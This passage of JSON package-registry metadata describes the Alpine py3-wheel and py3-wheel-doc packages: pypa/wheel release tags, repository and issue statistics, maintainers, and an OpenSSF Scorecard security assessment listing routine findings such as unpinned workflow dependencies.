"dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.26.0/manifests"},{"name":"0.25.0","sha":"4b9fd6bf095c1b4427ed65ac19e4d5666a719f33","kind":"commit","published_at":"2015-09-17T00:34:49.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.25.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.25.0/manifests"},{"name":"0.24.0","sha":"cd0935c4fe92a15ea83057a9357347ae8d6a138e","kind":"commit","published_at":"2014-07-06T16:56:09.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.24.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.24.0/manifests"},{"name":"0.23.0","sha":"75c59f175c8cb2bfcb6660927232b40df1e149c4","kind":"commit","published_at":"2014-04-01T02:01:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.23.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.23.0/manifests"},{"name":"0.22.0","sha":"f1cc0b8a8601040b864e1e784e160744c7e3d965","kind":"commit","published_at":"2013-09-15T20:45:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.22.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.22.0/manifests"},{"name":"0.21.0","sha":"474826f4d64064e852b541f099fa69dcf5dd20fa","kind":"commit","published_at":"2013-07-20T16:19:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.21.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.21.0/manifests"},{"name":"0.16.0","sha":"f65ab72e2c6b04d10a4153807f473c9e9af421d5","kind":"commit","published_at":"2013-04-30T01:46:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.16.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.16.0/manifests"},{"name":"0.15.0","sha":"dffddb1d5af9e736fdd6192ca9256dc767bfab51","kind":"commit","published_at":"2012-11-16T14:06:00.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.15.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.15.0/manifests"},{"name":"0.13.0","sha":"60fa189589155e43f33587f67eb44bb4fd7d5b58","kind":"commit","published_at":"2012-10-18T00:16:05.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.13.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.13.0/manifests"},{"name":"0.12.0","sha":"2861596953a6ddfb2c4f052a46a2e2b4c5619245","kind":"commit","published_at":"2012-10-06T12:34:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.12.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.12.0/manifests"},{"name":"0.11.0","sha":"8dd29d841e15596bc9b5d1c7f7576b2a66113f92","kind":"commit","published_at":"2012-10-06T12:18:46.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.11.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.11.0/manifests"},{"name":"0.10.3","sha":"7021b0ee2a51e5d9447d06038db58e9e597625f7","kind":"commit","published_at":"2012-10-03T22:55:11.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.3/manifests"},{"name":"0.10.2","sha":"126aaacc9f24fa69b6b74d4e742f645f6bb65cf3","kind":"commit","published_at":"2012-10-03T01:11:35.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.2/manifests"},{"name":"0.10.1","sha":"92e52e6745ec6b1178c2f42585c2f37ab04902a8","kind":"commit","published_at":"2012-10-01T02:52:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.1/manifests"},{"name":"0.10.0","sha":"9ee6da6d6cab3fa171f2704df5f934474acc4aae","kind":"commit","published_at":"2012-10-01T02:20:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.0/manifests"},{"name":"0.9.7","sha":"a118f5845570ebaf6566b8075dc1dcaf117d7d43","kind":"commit","published_at":"2012-09-20T15:52:36.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.7","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.7/manifests"},{"name":"0.9.6","sha":"0c4752551e4fa1d4e9786fc874ae97edf52c0369","kind":"commit","published_at":"2012-09-20T01:46:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.6/manifests"},{"name":"0.9.4","sha":"8db2d0d4760a0886998e3fca4206f5db3230d223","kind":"commit","published_at":"2012-09-11T12:32:56.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.4/manifests"},{"name":"0.9.3","sha":"ca65be72feaf5ebe92ef4c9e91bd722360c1ad2c","kind":"commit","published_at":"2012-09-11T02:38:10.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.3/manifests"},{"name":"0.9.1","sha":"6952bc635deb0afdf36c5f325aa166636f1c2a52","kind":"commit","published_at":"2012-08-28T23:07:55.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.1/manifests"},{"name":"0.9","sha":"49b1d5dac1cdeaf98998b1e5bdb0e2cf134edff3","kind":"commit","published_at":"2012-08-23T03:08:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9","html_url":"https://github.com/pypa/wheel/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9/manifests"},{"name":"0.7","sha":"b2930f5f5d3c898389bdbdd7c854a0b9d320cf14","kind":"commit","published_at":"2012-07-28T12:12:45.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.7","html_url":"https://github.com/pypa/wheel/releases/tag/0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.7/manifests"},{"name":"0.6","sha":"bdf9d5747a724664bd3588ab471907a900b45c9a","kind":"commit","published_at":"2012-07-23T16:26:11.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.6/manifests"},{"name":"0.5","sha":"d02f91dceda7c4a16cc26ea80f0eecfff638e4b2","kind":"commit","published_at":"2012-07-17T16:23:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.5","html_url":"https://github.com/pypa/wheel/releases/tag/0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.5/manifests"}]},"repo_metadata_updated_at":"2025-10-30T04:12:44.285Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":27.253845290221175,"stargazers_count":11.934433591557202,"forks_count":9.284832154485237,"average":12.118277759065904},"purl":"pkg:apk/alpine/py3-wheel-doc?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.17","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-wheel-doc","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-wheel-doc","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-wheel-doc/dependencies","status":null,"funding_links":["https://github.com/sponsors/pypa"],"critical":null,"issue_metadata":{"last_synced_at":"2025-10-26T09:45:16.065Z","issues_count":109,"pull_requests_count":184,"avg_time_to_close_issue":48693272.43877551,"avg_time_to_close_pull_request":2636588.9515151517,"issues_closed_count":98,"pull_requests_closed_count":165,"pull_request_authors_count":37,"issue_authors_count":90,"avg_comments_per_issue":5.908256880733945,"avg_comments_per_pull_request":3.5217391304347827,"merged_pull_requests_count":140,"bot_issues_count":0,"bot_pull_requests_count":65,"past_year_issues_count":16,"past_year_pull_requests_count":34,"past_year_avg_time_to_close_issue":238596.63636363635,"past_year_avg_time_to_close_pull_request":890483.8846153846,"past_year_issues_closed_count":11,"past_year_pull_requests_closed_count":26,"past_year_pull_request_authors_count":11,"past_year_issue_authors_count":15,"past_year_avg_comments_per_issue":4.25,"past_year_avg_comments_per_pull_request":3.0588235294117645,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":8,"past_year_merged_pull_requests_count":23,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/issues","maintainers":[{"login":"jaraco","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"},{"login":"woodruffw","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/woodruffw"},{"login":"di","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/di"},{"login":"uranusjr","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/uranusjr"},{"login":"pradyunsg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pradyunsg"},{"login":"mayeut","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mayeut"},{"login":"alex","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alex"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.17/packages/py3-wheel-doc/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.17/packages/py3-wheel-doc/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.17/packages/py3-wheel-doc/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.17/packages/py3-wheel-doc/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.17/packages/py3-wheel-doc/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.17/packages/py3-wheel-doc/codemeta","maintainers":[{"uuid":"alice@ayaya.dev","login":null,"name":"psykose","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=psykose","packages_count":263,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=psykose","role":null,"created_at":"2023-02-01T04:50:37.761Z","updated_at":"2023-02-01T04:50:37.761Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.17/maintainers/alice@ayaya.dev/packages"}],"registry":{"name":"alpine-v3.17","url":"https://pkgs.alpinelinux.org/packages?branch=v3.17","ecosystem":"alpine","default":false,"packages_count":17817,"maintainers_count":352,"namespaces_count":2,"keywords_count":3377,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":1038},"icon_url":"https://github.com/alpinelinux.png","created_at":"2023-01-31T17:27:50.642Z","updated_at":"2026-06-10T05:19:47.280Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.17/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.17/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.17/namespaces"}},{"id":6082864,"name":"py3-wheel","ecosystem":"alpine","description":"built-package format for Python","homepage":"https://github.com/pypa/wheel","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/pypa/wheel","keywords_array":[],"namespace":"main","versions_count":1,"first_release_published_at":"2022-11-09T22:20:22.000Z","latest_release_published_at":"2022-11-09T22:20:22.000Z","latest_release_number":"0.38.4-r0","last_synced_at":"2026-04-08T14:07:41.290Z","created_at":"2023-01-31T19:59:58.325Z","updated_at":"2026-04-08T14:07:41.290Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.17/main/x86_64/py3-wheel","install_command":"apk add py3-wheel","documentation_url":null,"metadata":{"repository":"main","architecture":"x86_64"},"repo_metadata":{"id":23174547,"uuid":"98346885","full_name":"pypa/wheel","owner":"pypa","description":"The official binary distribution format for Python","archived":false,"fork":false,"pushed_at":"2025-10-06T19:13:50.000Z","size":1827,"stargazers_count":539,"open_issues_count":14,"forks_count":171,"subscribers_count":30,"default_branch":"main","last_synced_at":"2025-10-30T00:35:00.752Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/pypa.png","metadata":{"files":{"readme":"README.rst","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2017-07-25T20:24:25.000Z","updated_at":"2025-10-29T13:00:22.000Z","dependencies_parsed_at":"2024-02-03T11:27:24.404Z","dependency_job_id":"c444d7cc-5eb9-412d-b647-9474b7b4096f","html_url":"https://github.com/pypa/wheel","commit_stats":{"total_commits":913,"total_committers":82,"mean_commits":"11.134146341463415","dds":0.6297918948521358,"last_synced_commit":"baf6bf89562cb42a0ca71cc1e804600b161952eb"},"previous_names":[],"tags_count":68,"template":false,"template_full_name":null,"purl":"pkg:github/pypa/wheel","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/sbom","scorecard":{"id":751706,"data":{"date":"2025-08-11","repo":{"name":"github.com/pypa/wheel","commit":"15b7577654e8bcd23e009c6bac036b65c11d8d8f"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5,"checks":[{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:50: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:52: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:56: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:31: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/publish.yml:23","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:41","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:43","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:46","Info:   0 out of   7 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned","Info:   0 out of   4 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Maintained","score":1,"reason":"1 commit(s) and 1 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Code-Review","score":2,"reason":"Found 8/27 approved changesets -- score normalized to 2","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/publish.yml:48","Warn: no topLevel permission defined: .github/workflows/publish.yml:1","Warn: no topLevel permission defined: .github/workflows/test.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.txt:0","Info: FSF or OSI recognized license: MIT License: LICENSE.txt:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/publish.yml:31"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Security-Policy","score":0,"reason":"security policy file not detected","details":["Warn: no security policy file detected","Warn: no security file to analyze","Warn: no security file to analyze","Warn: no security file to analyze"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":5,"reason":"SAST tool is not run on all commits -- score normalized to 5","details":["Warn: 6 commits out of 12 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-22T20:33:25.724Z","repository_id":23174547,"created_at":"2025-08-22T20:33:25.724Z","updated_at":"2025-08-22T20:33:25.724Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":281742688,"owners_count":26553720,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-30T02:00:06.501Z","response_time":61,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url"